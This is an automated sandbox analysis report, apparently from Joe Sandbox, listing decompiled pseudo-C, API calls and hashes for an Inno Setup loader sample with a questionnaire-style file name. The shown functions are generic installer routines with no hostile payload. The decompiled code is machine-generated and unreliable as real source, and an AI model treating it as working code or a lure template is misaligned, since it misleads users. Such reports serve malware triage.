                                                                                                • Part of subcall function 004076B8: GetStdHandle.KERNEL32(000000F5,Runtime error at 00000000,0000001D,?,00000000,?,00407770,?,?,?,0040788A,004054FF,00405546,?,?,0040555F), ref: 004076F1
                                                                                                • Part of subcall function 004076B8: WriteFile.KERNEL32(00000000,000000F5,Runtime error at 00000000,0000001D,?,00000000,?,00407770,?,?,?,0040788A,004054FF,00405546,?,?), ref: 004076F7
                                                                                                • Part of subcall function 004076B8: GetStdHandle.KERNEL32(000000F5,00000000,00000002,?,00000000,00000000,000000F5,Runtime error at 00000000,0000001D,?,00000000,?,00407770,?,?,?), ref: 00407712
                                                                                                • Part of subcall function 004076B8: WriteFile.KERNEL32(00000000,000000F5,00000000,00000002,?,00000000,00000000,000000F5,Runtime error at 00000000,0000001D,?,00000000,?,00407770,?,?), ref: 00407718
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.344159474.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.344099874.0000000000400000.00000002.00020000.sdmp
                                                                                              • Associated: 00000000.00000002.345709208.00000000004B7000.00000004.00020000.sdmp
                                                                                              • Associated: 00000000.00000002.345761453.00000000004C0000.00000004.00020000.sdmp
                                                                                              • Associated: 00000000.00000002.345836163.00000000004C4000.00000002.00020000.sdmp
                                                                                              • Associated: 00000000.00000002.345894244.00000000004C6000.00000002.00020000.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_Girls-Questionnaire-For-Autism-Spectrum-Disorders.jbxd
                                                                                              Similarity
                                                                                              • API ID: FileHandleWrite$CurrentExitFreeLibraryProcessThread
                                                                                              • String ID: MZP
                                                                                              • API String ID: 3490077880-2889622443
                                                                                              • Opcode ID: 1e4888025ee955e8cc7e0f2d2f1a13e961f3985afae2446d4f356ca194078bac
                                                                                              • Instruction ID: bfc25cbdcfe625b544084418af651039c1e49876b6b13a82c314e6a817d38f33
                                                                                              • Opcode Fuzzy Hash: 1e4888025ee955e8cc7e0f2d2f1a13e961f3985afae2446d4f356ca194078bac
                                                                                              • Instruction Fuzzy Hash: E3314D20E087419BE721BB7A888935B7BA09B05315F14897FE541A73D2D77CB884CB6F
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Control-flow Graph

                                                                                              C-Code - Quality: 79%
                                                                                              			E004B5000(void* __ecx, void* __edx) {
                                                                                              				intOrPtr _t19;
                                                                                              				intOrPtr _t22;
                                                                                              
                                                                                              				_push(_t22);
                                                                                              				_push(0x4b50d7);
                                                                                              				_push( *[fs:eax]);
                                                                                              				 *[fs:eax] = _t22;
                                                                                              				 *0x4bb98c =  *0x4bb98c - 1;
                                                                                              				if( *0x4bb98c < 0) {
                                                                                              					E00405B74();
                                                                                              					E004051A8();
                                                                                              					SetThreadLocale(0x400); // executed
                                                                                              					E0040A250();
                                                                                              					 *0x4b700c = 2;
                                                                                              					 *0x4bb01c = 0x4036b0;
                                                                                              					 *0x4bb020 = 0x4036b8;
                                                                                              					 *0x4bb05a = 2;
                                                                                              					 *0x4bb060 = E0040CAA4();
                                                                                              					 *0x4bb008 = 0x4095a0;
                                                                                              					E00405BCC(E00405BB0());
                                                                                              					 *0x4bb068 = 0xd7b0;
                                                                                              					 *0x4bb344 = 0xd7b0;
                                                                                              					 *0x4bb620 = 0xd7b0;
                                                                                              					 *0x4bb050 = GetCommandLineW();
                                                                                              					 *0x4bb04c = E00403810();
                                                                                              					 *0x4bb97c = GetACP();
                                                                                              					 *0x4bb980 = 0x4b0;
                                                                                              					 *0x4bb044 = GetCurrentThreadId();
                                                                                              					E0040CAB8();
                                                                                              				}
                                                                                              				_pop(_t19);
                                                                                              				 *[fs:eax] = _t19;
                                                                                              				_push(0x4b50de);
                                                                                              				return 0;
                                                                                              			}






                                                                                              APIs
                                                                                              • SetThreadLocale.KERNEL32(00000400,00000000,004B50D7), ref: 004B502D
                                                                                                • Part of subcall function 0040A250: InitializeCriticalSection.KERNEL32(004BDC10,004B5037,00000400,00000000,004B50D7), ref: 0040A255
                                                                                                • Part of subcall function 0040A250: GetVersion.KERNEL32(004BDC10,004B5037,00000400,00000000,004B50D7), ref: 0040A263
                                                                                                • Part of subcall function 0040A250: GetModuleHandleW.KERNEL32(kernel32.dll,GetThreadPreferredUILanguages,004BDC10,004B5037,00000400,00000000,004B50D7), ref: 0040A28A
                                                                                                • Part of subcall function 0040A250: GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 0040A290
                                                                                                • Part of subcall function 0040A250: GetModuleHandleW.KERNEL32(kernel32.dll,SetThreadPreferredUILanguages,00000000,kernel32.dll,GetThreadPreferredUILanguages,004BDC10,004B5037,00000400,00000000,004B50D7), ref: 0040A2A4
                                                                                                • Part of subcall function 0040A250: GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 0040A2AA
                                                                                                • Part of subcall function 0040A250: GetModuleHandleW.KERNEL32(kernel32.dll,GetThreadUILanguage,00000000,kernel32.dll,SetThreadPreferredUILanguages,00000000,kernel32.dll,GetThreadPreferredUILanguages,004BDC10,004B5037,00000400,00000000,004B50D7), ref: 0040A2BE
                                                                                                • Part of subcall function 0040A250: GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 0040A2C4
                                                                                                • Part of subcall function 0040CAA4: GetSystemInfo.KERNEL32 ref: 0040CAA8
                                                                                              • GetCommandLineW.KERNEL32(00000400,00000000,004B50D7), ref: 004B5092
                                                                                                • Part of subcall function 00403810: GetStartupInfoW.KERNEL32 ref: 00403821
                                                                                              • GetACP.KERNEL32(00000400,00000000,004B50D7), ref: 004B50A6
                                                                                              • GetCurrentThreadId.KERNEL32 ref: 004B50BA
                                                                                                • Part of subcall function 0040CAB8: GetVersion.KERNEL32(004B50C9,00000400,00000000,004B50D7), ref: 0040CAB8
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.344159474.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.344099874.0000000000400000.00000002.00020000.sdmp
                                                                                              • Associated: 00000000.00000002.345709208.00000000004B7000.00000004.00020000.sdmp
                                                                                              • Associated: 00000000.00000002.345761453.00000000004C0000.00000004.00020000.sdmp
                                                                                              • Associated: 00000000.00000002.345836163.00000000004C4000.00000002.00020000.sdmp
                                                                                              • Associated: 00000000.00000002.345894244.00000000004C6000.00000002.00020000.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_Girls-Questionnaire-For-Autism-Spectrum-Disorders.jbxd
                                                                                              Similarity
                                                                                              • API ID: AddressHandleModuleProc$InfoThreadVersion$CommandCriticalCurrentInitializeLineLocaleSectionStartupSystem
                                                                                              • String ID:
                                                                                              • API String ID: 2740004594-0
                                                                                              • Opcode ID: aeeb1ef19c021384e5e919f33d2f1f63d534ea4b25bb20b8f726cabb6b9d9f22
                                                                                              • Instruction ID: 4c04e7183c3d5c6504f231a905193e891933426fc174ea8e71756e1f90614aff
                                                                                              • Opcode Fuzzy Hash: aeeb1ef19c021384e5e919f33d2f1f63d534ea4b25bb20b8f726cabb6b9d9f22
                                                                                              • Instruction Fuzzy Hash: 46111CB04047449FE311BF76A8062267BA8EB05309B508A7FE110662E2EBFD15048FEE
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Control-flow Graph

                                                                                              C-Code - Quality: 73%
                                                                                              			E004AEFE8(void* __eax, long __ebx, void* __edx, void* __edi, void* __esi) {
                                                                                              				char _v8;
                                                                                              				char _v12;
                                                                                              				char* _v16;
                                                                                              				char _v20;
                                                                                              				intOrPtr _v24;
                                                                                              				char _v28;
                                                                                              				char _v32;
                                                                                              				char _v36;
                                                                                              				char _v40;
                                                                                              				int _t30;
                                                                                              				intOrPtr _t63;
                                                                                              				void* _t71;
                                                                                              				void* _t73;
                                                                                              				intOrPtr _t75;
                                                                                              				intOrPtr _t76;
                                                                                              
                                                                                              				_t71 = __edi;
                                                                                              				_t54 = __ebx;
                                                                                              				_t75 = _t76;
                                                                                              				_t55 = 4;
                                                                                              				do {
                                                                                              					_push(0);
                                                                                              					_push(0);
                                                                                              					_t55 = _t55 - 1;
                                                                                              				} while (_t55 != 0);
                                                                                              				_push(_t55);
                                                                                              				_push(__ebx);
                                                                                              				_t73 = __eax;
                                                                                              				_t78 = 0;
                                                                                              				_push(_t75);
                                                                                              				_push(0x4af0e1);
                                                                                              				_push( *[fs:eax]);
                                                                                              				 *[fs:eax] = _t76;
                                                                                              				while(1) {
                                                                                              					E00422D70( &_v12, _t54, _t55, _t78); // executed
                                                                                              					_t55 = L".tmp";
                                                                                              					E004AEEC8(0, _t54, L".tmp", _v12, _t71, _t73,  &_v8); // executed
                                                                                              					_t30 = CreateDirectoryW(E004084EC(_v8), 0); // executed
                                                                                              					if(_t30 != 0) {
                                                                                              						break;
                                                                                              					}
                                                                                              					_t54 = GetLastError();
                                                                                              					_t78 = _t54 - 0xb7;
                                                                                              					if(_t54 != 0xb7) {
                                                                                              						E00426F08(0x3d,  &_v32, _v8);
                                                                                              						_v28 = _v32;
                                                                                              						E00419E18( &_v36, _t54, 0);
                                                                                              						_v24 = _v36;
                                                                                              						E004232EC(_t54,  &_v40);
                                                                                              						_v20 = _v40;
                                                                                              						E00426ED8(0x81, 2,  &_v28,  &_v16);
                                                                                              						_t55 = _v16;
                                                                                              						E0041F264(_v16, 1);
                                                                                              						E0040711C();
                                                                                              					}
                                                                                              				}
                                                                                              				E00407E00(_t73, _v8);
                                                                                              				__eflags = 0;
                                                                                              				_pop(_t63);
                                                                                              				 *[fs:eax] = _t63;
                                                                                              				_push(E004AF0E8);
                                                                                              				E00407A80( &_v40, 3);
                                                                                              				return E00407A80( &_v16, 3);
                                                                                              			}



















                                                                                              APIs
                                                                                              • CreateDirectoryW.KERNEL32(00000000,00000000,?,00000000,004AF0E1,?,?,?,00000003,00000000,00000000,?,004B619F), ref: 004AF030
                                                                                              • GetLastError.KERNEL32(00000000,00000000,?,00000000,004AF0E1,?,?,?,00000003,00000000,00000000,?,004B619F), ref: 004AF039
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.344159474.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.344099874.0000000000400000.00000002.00020000.sdmp
                                                                                              • Associated: 00000000.00000002.345709208.00000000004B7000.00000004.00020000.sdmp
                                                                                              • Associated: 00000000.00000002.345761453.00000000004C0000.00000004.00020000.sdmp
                                                                                              • Associated: 00000000.00000002.345836163.00000000004C4000.00000002.00020000.sdmp
                                                                                              • Associated: 00000000.00000002.345894244.00000000004C6000.00000002.00020000.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_Girls-Questionnaire-For-Autism-Spectrum-Disorders.jbxd
                                                                                              Similarity
                                                                                              • API ID: CreateDirectoryErrorLast
                                                                                              • String ID: .tmp
                                                                                              • API String ID: 1375471231-2986845003
                                                                                              • Opcode ID: b866ae3ac5566b90e4d091c6d0119bd5c5d6e6cd69059738e462e2ab807557f0
                                                                                              • Instruction ID: 89b964d67460c442e7c67535b057b8112791baa86db9a38931a927ffd746d2a8
                                                                                              • Opcode Fuzzy Hash: b866ae3ac5566b90e4d091c6d0119bd5c5d6e6cd69059738e462e2ab807557f0
                                                                                              • Instruction Fuzzy Hash: 3A218735A041089BDB00EBE1C842ADFB3B9EB49304F50447BF800F7381DA386E058BA9
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 551 40e450-40e4a4 call 405740 CreateWindowExW call 405730
                                                                                              C-Code - Quality: 100%
                                                                                              			E0040E450(long __eax, WCHAR* __edx, void* _a4, struct HINSTANCE__* _a8, struct HMENU__* _a12, struct HWND__* _a16, int _a20, int _a24, int _a28, int _a32, long _a36) {
                                                                                              				WCHAR* _v8;
                                                                                              				void* _t13;
                                                                                              				struct HWND__* _t24;
                                                                                              				WCHAR* _t29;
                                                                                              				long _t32;
                                                                                              
                                                                                              				_v8 = _t29;
                                                                                              				_t32 = __eax;
                                                                                              				_t13 = E00405740();
                                                                                              				_t24 = CreateWindowExW(_t32, __edx, _v8, _a36, _a32, _a28, _a24, _a20, _a16, _a12, _a8, _a4); // executed
                                                                                              				E00405730(_t13);
                                                                                              				return _t24;
                                                                                              			}









                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.344159474.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.344099874.0000000000400000.00000002.00020000.sdmp
                                                                                              • Associated: 00000000.00000002.345709208.00000000004B7000.00000004.00020000.sdmp
                                                                                              • Associated: 00000000.00000002.345761453.00000000004C0000.00000004.00020000.sdmp
                                                                                              • Associated: 00000000.00000002.345836163.00000000004C4000.00000002.00020000.sdmp
                                                                                              • Associated: 00000000.00000002.345894244.00000000004C6000.00000002.00020000.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_Girls-Questionnaire-For-Autism-Spectrum-Disorders.jbxd
                                                                                              Similarity
                                                                                              • API ID: CreateWindow
                                                                                              • String ID: InnoSetupLdrWindow$STATIC
                                                                                              • API String ID: 716092398-2209255943
                                                                                              • Opcode ID: 4ba199ab3c1e041c72a50ebd66c3ee798d5f8225e8fee486b5eb3d70e3749009
                                                                                              • Instruction ID: 770f17d29583ffea265d4876c6cd55b491c436ce5e2cc0b006eebdc9bc405b2a
                                                                                              • Opcode Fuzzy Hash: 4ba199ab3c1e041c72a50ebd66c3ee798d5f8225e8fee486b5eb3d70e3749009
                                                                                              • Instruction Fuzzy Hash: 73F07FB6600118AF9B84DE9EDC85E9B77ECEB4D264B05412ABA08E7201D634ED118BA4
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 556 4af1b4-4af1c5 557 4af20e-4af213 556->557 558 4af1c7-4af1c8 556->558 559 4af1ca-4af1cd 558->559 560 4af1da-4af1dd 559->560 561 4af1cf-4af1d8 Sleep 559->561 562 4af1e8-4af1ed call 427154 560->562 563 4af1df-4af1e3 Sleep 560->563 561->562 565 4af1f2-4af1f4 562->565 563->562 565->557 566 4af1f6-4af1fe GetLastError 565->566 566->557 567 4af200-4af208 GetLastError 566->567 567->557 568 4af20a-4af20c 567->568 568->557 568->559
                                                                                              C-Code - Quality: 100%
                                                                                              			E004AF1B4(long __eax, intOrPtr __edx, long _a4, long _a8) {
                                                                                              				intOrPtr _v8;
                                                                                              				long _t5;
                                                                                              				long _t9;
                                                                                              				void* _t10;
                                                                                              				void* _t13;
                                                                                              				void* _t15;
                                                                                              				void* _t16;
                                                                                              
                                                                                              				_t5 = __eax;
                                                                                              				_v8 = __edx;
                                                                                              				_t9 = __eax;
                                                                                              				_t15 = _t10 - 1;
                                                                                              				if(_t15 < 0) {
                                                                                              					L10:
                                                                                              					return _t5;
                                                                                              				}
                                                                                              				_t16 = _t15 + 1;
                                                                                              				_t13 = 0;
                                                                                              				while(1) {
                                                                                              					_t19 = _t13 - 1;
                                                                                              					if(_t13 != 1) {
                                                                                              						__eflags = _t13 - 1;
                                                                                              						if(__eflags > 0) {
                                                                                              							Sleep(_a4);
                                                                                              						}
                                                                                              					} else {
                                                                                              						Sleep(_a8);
                                                                                              					}
                                                                                              					_t5 = E00427154(_t9, _v8, _t19); // executed
                                                                                              					if(_t5 != 0) {
                                                                                              						goto L10;
                                                                                              					}
                                                                                              					_t5 = GetLastError();
                                                                                              					if(_t5 == 2) {
                                                                                              						goto L10;
                                                                                              					}
                                                                                              					_t5 = GetLastError();
                                                                                              					if(_t5 == 3) {
                                                                                              						goto L10;
                                                                                              					}
                                                                                              					_t13 = _t13 + 1;
                                                                                              					_t16 = _t16 - 1;
                                                                                              					if(_t16 != 0) {
                                                                                              						continue;
                                                                                              					}
                                                                                              					goto L10;
                                                                                              				}
                                                                                              				goto L10;
                                                                                              			}











                                                                                              APIs
                                                                                              • Sleep.KERNEL32(?,?,?,?,0000000D,?,004B64EC,000000FA,00000032,004B6554), ref: 004AF1D3
                                                                                              • Sleep.KERNEL32(?,?,?,?,0000000D,?,004B64EC,000000FA,00000032,004B6554), ref: 004AF1E3
                                                                                              • GetLastError.KERNEL32(?,?,?,0000000D,?,004B64EC,000000FA,00000032,004B6554), ref: 004AF1F6
                                                                                              • GetLastError.KERNEL32(?,?,?,0000000D,?,004B64EC,000000FA,00000032,004B6554), ref: 004AF200
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.344159474.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.344099874.0000000000400000.00000002.00020000.sdmp
                                                                                              • Associated: 00000000.00000002.345709208.00000000004B7000.00000004.00020000.sdmp
                                                                                              • Associated: 00000000.00000002.345761453.00000000004C0000.00000004.00020000.sdmp
                                                                                              • Associated: 00000000.00000002.345836163.00000000004C4000.00000002.00020000.sdmp
                                                                                              • Associated: 00000000.00000002.345894244.00000000004C6000.00000002.00020000.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_Girls-Questionnaire-For-Autism-Spectrum-Disorders.jbxd
                                                                                              Similarity
                                                                                              • API ID: ErrorLastSleep
                                                                                              • String ID:
                                                                                              • API String ID: 1458359878-0
                                                                                              • Opcode ID: 132a67e1d44d9774a6928004e5d8cee8820d44842addde93f31c36794548402b
                                                                                              • Instruction ID: c6a2870ed3ca6a3ef6dac7de38143878fdab2d33d6efdb0808b7300bb595a527
                                                                                              • Opcode Fuzzy Hash: 132a67e1d44d9774a6928004e5d8cee8820d44842addde93f31c36794548402b
                                                                                              • Instruction Fuzzy Hash: 0CF02B37B04224A76724A5EBEC46D6FE298DEB33A8710457BFC04D7302C439CC4542A8
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 63%
                                                                                              			E0041FF94(void* __eax, void* __ebx, signed int* __ecx, signed int* __edx, void* __edi, void* __esi, signed int* _a4) {
                                                                                              				char _v8;
                                                                                              				char _v9;
                                                                                              				int _v16;
                                                                                              				void* _v20;
                                                                                              				void* _v24;
                                                                                              				int _v28;
                                                                                              				int _t33;
                                                                                              				int _t43;
                                                                                              				int _t64;
                                                                                              				intOrPtr _t72;
                                                                                              				intOrPtr _t74;
                                                                                              				signed int* _t77;
                                                                                              				signed int* _t79;
                                                                                              				void* _t81;
                                                                                              				void* _t82;
                                                                                              				intOrPtr _t83;
                                                                                              
                                                                                              				_t81 = _t82;
                                                                                              				_t83 = _t82 + 0xffffffe8;
                                                                                              				_v8 = 0;
                                                                                              				_t77 = __ecx;
                                                                                              				_t79 = __edx;
                                                                                              				_push(_t81);
                                                                                              				_push(0x420094);
                                                                                              				_push( *[fs:eax]);
                                                                                              				 *[fs:eax] = _t83;
                                                                                              				_v9 = 0;
                                                                                              				E00407E48( &_v8, __eax);
                                                                                              				E00407FB0( &_v8);
                                                                                              				_t33 = GetFileVersionInfoSizeW(E004084EC(_v8),  &_v16); // executed
                                                                                              				_t64 = _t33;
                                                                                              				if(_t64 == 0) {
                                                                                              					_pop(_t72);
                                                                                              					 *[fs:eax] = _t72;
                                                                                              					_push(0x42009b);
                                                                                              					return E00407A20( &_v8);
                                                                                              				} else {
                                                                                              					_v20 = E004053F0(_t64);
                                                                                              					_push(_t81);
                                                                                              					_push(0x420077);
                                                                                              					_push( *[fs:edx]);
                                                                                              					 *[fs:edx] = _t83;
                                                                                              					_t43 = GetFileVersionInfoW(E004084EC(_v8), _v16, _t64, _v20); // executed
                                                                                              					if(_t43 != 0 && VerQueryValueW(_v20, 0x4200a8,  &_v24,  &_v28) != 0) {
                                                                                              						 *_t79 =  *(_v24 + 0x10) >> 0x00000010 & 0x0000ffff;
                                                                                              						 *_t77 =  *(_v24 + 0x10) & 0x0000ffff;
                                                                                              						 *_a4 =  *(_v24 + 0x14) >> 0x00000010 & 0x0000ffff;
                                                                                              						_v9 = 1;
                                                                                              					}
                                                                                              					_pop(_t74);
                                                                                              					 *[fs:eax] = _t74;
                                                                                              					_push(0x42007e);
                                                                                              					return E0040540C(_v20);
                                                                                              				}
                                                                                              			}




















                                                                                              APIs
                                                                                              • GetFileVersionInfoSizeW.VERSION(00000000,?,00000000,00420094), ref: 0041FFD9
                                                                                              • GetFileVersionInfoW.VERSION(00000000,?,00000000,?,00000000,00420077,?,00000000,?,00000000,00420094), ref: 00420012
                                                                                              • VerQueryValueW.VERSION(?,004200A8,?,?,00000000,?,00000000,?,00000000,00420077,?,00000000,?,00000000,00420094), ref: 0042002C
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.344159474.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.344099874.0000000000400000.00000002.00020000.sdmp
                                                                                              • Associated: 00000000.00000002.345709208.00000000004B7000.00000004.00020000.sdmp
                                                                                              • Associated: 00000000.00000002.345761453.00000000004C0000.00000004.00020000.sdmp
                                                                                              • Associated: 00000000.00000002.345836163.00000000004C4000.00000002.00020000.sdmp
                                                                                              • Associated: 00000000.00000002.345894244.00000000004C6000.00000002.00020000.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_Girls-Questionnaire-For-Autism-Spectrum-Disorders.jbxd
                                                                                              Similarity
                                                                                              • API ID: FileInfoVersion$QuerySizeValue
                                                                                              • String ID:
                                                                                              • API String ID: 2179348866-0
                                                                                              • Opcode ID: db1b7188df03ba7b3b32e0e3197f16d1bbb1710ebdecda22b0e2c2fca2e7d661
                                                                                              • Instruction ID: 087fa93cc02b824bee97242c1a4c1e6fbe52d07f241be95d6751b2a9bfa32856
                                                                                              • Opcode Fuzzy Hash: db1b7188df03ba7b3b32e0e3197f16d1bbb1710ebdecda22b0e2c2fca2e7d661
                                                                                              • Instruction Fuzzy Hash: 19314771A042199FD710DFA9D941DAFB7F8EB48700B91447AF944E3252D778DD00C765
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 72%
                                                                                              			E0040B110(intOrPtr __eax, void* __ebx, signed int __ecx, signed int __edx, void* __edi, void* __esi) {
                                                                                              				intOrPtr _v8;
                                                                                              				signed int _v12;
                                                                                              				char _v16;
                                                                                              				char _v20;
                                                                                              				char _v24;
                                                                                              				char _v28;
                                                                                              				signed int _t41;
                                                                                              				signed short _t43;
                                                                                              				signed short _t46;
                                                                                              				signed int _t60;
                                                                                              				intOrPtr _t68;
                                                                                              				void* _t79;
                                                                                              				signed int* _t81;
                                                                                              				intOrPtr _t84;
                                                                                              
                                                                                              				_t79 = __edi;
                                                                                              				_t61 = __ecx;
                                                                                              				_push(0);
                                                                                              				_push(0);
                                                                                              				_push(0);
                                                                                              				_push(0);
                                                                                              				_push(0);
                                                                                              				_push(0);
                                                                                              				_push(__ebx);
                                                                                              				_push(__esi);
                                                                                              				_t81 = __ecx;
                                                                                              				_v12 = __edx;
                                                                                              				_v8 = __eax;
                                                                                              				E00407B04(_v8);
                                                                                              				E00407B04(_v12);
                                                                                              				_push(_t84);
                                                                                              				_push(0x40b227);
                                                                                              				_push( *[fs:eax]);
                                                                                              				 *[fs:eax] = _t84;
                                                                                              				E00407A20(__ecx);
                                                                                              				if(_v12 == 0) {
                                                                                              					L14:
                                                                                              					_pop(_t68);
                                                                                              					 *[fs:eax] = _t68;
                                                                                              					_push(E0040B22E);
                                                                                              					return E00407A80( &_v28, 6);
                                                                                              				}
                                                                                              				E00407E48( &_v20, _v12);
                                                                                              				_t41 = _v12;
                                                                                              				if(_t41 != 0) {
                                                                                              					_t41 =  *(_t41 - 4);
                                                                                              				}
                                                                                              				_t60 = _t41;
                                                                                              				if(_t60 < 1) {
                                                                                              					L7:
                                                                                              					_t43 = E0040AE34(_v8, _t60, _t61,  &_v16, _t81); // executed
                                                                                              					if(_v16 == 0) {
                                                                                              						L00403730();
                                                                                              						E0040A7E4(_t43, _t60,  &_v24, _t79, _t81);
                                                                                              						_t46 = E0040AF60(_v20, _t60, _t81, _v24, _t79, _t81); // executed
                                                                                              						__eflags =  *_t81;
                                                                                              						if( *_t81 == 0) {
                                                                                              							__eflags =  *0x4bdc0c;
                                                                                              							if( *0x4bdc0c == 0) {
                                                                                              								L00403738();
                                                                                              								E0040A7E4(_t46, _t60,  &_v28, _t79, _t81);
                                                                                              								E0040AF60(_v20, _t60, _t81, _v28, _t79, _t81);
                                                                                              							}
                                                                                              						}
                                                                                              						__eflags =  *_t81;
                                                                                              						if(__eflags == 0) {
                                                                                              							E0040B044(_v20, _t60, _t81, __eflags); // executed
                                                                                              						}
                                                                                              					} else {
                                                                                              						E0040AF60(_v20, _t60, _t81, _v16, _t79, _t81);
                                                                                              					}
                                                                                              					goto L14;
                                                                                              				}
                                                                                              				while( *((short*)(_v12 + _t60 * 2 - 2)) != 0x2e) {
                                                                                              					_t60 = _t60 - 1;
                                                                                              					__eflags = _t60;
                                                                                              					if(_t60 != 0) {
                                                                                              						continue;
                                                                                              					}
                                                                                              					goto L7;
                                                                                              				}
                                                                                              				_t61 = _t60;
                                                                                              				E004088AC(_v12, _t60, 1,  &_v20);
                                                                                              				goto L7;
                                                                                              			}


















                                                                                              APIs
                                                                                              • GetUserDefaultUILanguage.KERNEL32(00000000,0040B227,?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,0040B2AE,00000000,?,00000105), ref: 0040B1BB
                                                                                              • GetSystemDefaultUILanguage.KERNEL32(00000000,0040B227,?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,0040B2AE,00000000,?,00000105), ref: 0040B1E3
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.344159474.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.344099874.0000000000400000.00000002.00020000.sdmp
                                                                                              • Associated: 00000000.00000002.345709208.00000000004B7000.00000004.00020000.sdmp
                                                                                              • Associated: 00000000.00000002.345761453.00000000004C0000.00000004.00020000.sdmp
                                                                                              • Associated: 00000000.00000002.345836163.00000000004C4000.00000002.00020000.sdmp
                                                                                              • Associated: 00000000.00000002.345894244.00000000004C6000.00000002.00020000.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_Girls-Questionnaire-For-Autism-Spectrum-Disorders.jbxd
                                                                                              Similarity
                                                                                              • API ID: DefaultLanguage$SystemUser
                                                                                              • String ID:
                                                                                              • API String ID: 384301227-0
                                                                                              • Opcode ID: 8091743a5a45bbad2069f173d476493d8776fa257b9783c2651a700d4e0e0a8f
                                                                                              • Instruction ID: e5bcb09f7540d0846d638ab8db7cc306f2a88a3609992180fc1e837192b0f5a6
                                                                                              • Opcode Fuzzy Hash: 8091743a5a45bbad2069f173d476493d8776fa257b9783c2651a700d4e0e0a8f
                                                                                              • Instruction Fuzzy Hash: B0313070A142499BDB10EBA5C891AAEB7B5EF48304F50857BE400B73D1DB7CAD41CB9E
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 58%
                                                                                              			E0040B234(void* __eax, void* __ebx, void* __edi, void* __esi, void* __eflags) {
                                                                                              				char _v8;
                                                                                              				short _v530;
                                                                                              				char _v536;
                                                                                              				char _v540;
                                                                                              				void* _t44;
                                                                                              				intOrPtr _t45;
                                                                                              				void* _t49;
                                                                                              				void* _t52;
                                                                                              
                                                                                              				_v536 = 0;
                                                                                              				_v540 = 0;
                                                                                              				_v8 = 0;
                                                                                              				_t49 = __eax;
                                                                                              				_push(_t52);
                                                                                              				_push(0x40b2ee);
                                                                                              				_push( *[fs:eax]);
                                                                                              				 *[fs:eax] = _t52 + 0xfffffde8;
                                                                                              				GetModuleFileNameW(0,  &_v530, 0x105);
                                                                                              				E00408550( &_v536, _t49);
                                                                                              				_push(_v536);
                                                                                              				E0040858C( &_v540, 0x105,  &_v530);
                                                                                              				_pop(_t44); // executed
                                                                                              				E0040B110(_v540, 0,  &_v8, _t44, __edi, _t49); // executed
                                                                                              				if(_v8 != 0) {
                                                                                              					LoadLibraryExW(E004084EC(_v8), 0, 2);
                                                                                              				}
                                                                                              				_pop(_t45);
                                                                                              				 *[fs:eax] = _t45;
                                                                                              				_push(E0040B2F5);
                                                                                              				E00407A80( &_v540, 2);
                                                                                              				return E00407A20( &_v8);
                                                                                              			}












                                                                                              APIs
                                                                                              • GetModuleFileNameW.KERNEL32(00000000,?,00000105,00000000,0040B2EE,?,?,00000000), ref: 0040B270
                                                                                              • LoadLibraryExW.KERNEL32(00000000,00000000,00000002,00000000,?,00000105,00000000,0040B2EE,?,?,00000000), ref: 0040B2C1
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.344159474.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.344099874.0000000000400000.00000002.00020000.sdmp
                                                                                              • Associated: 00000000.00000002.345709208.00000000004B7000.00000004.00020000.sdmp
                                                                                              • Associated: 00000000.00000002.345761453.00000000004C0000.00000004.00020000.sdmp
                                                                                              • Associated: 00000000.00000002.345836163.00000000004C4000.00000002.00020000.sdmp
                                                                                              • Associated: 00000000.00000002.345894244.00000000004C6000.00000002.00020000.sdmp
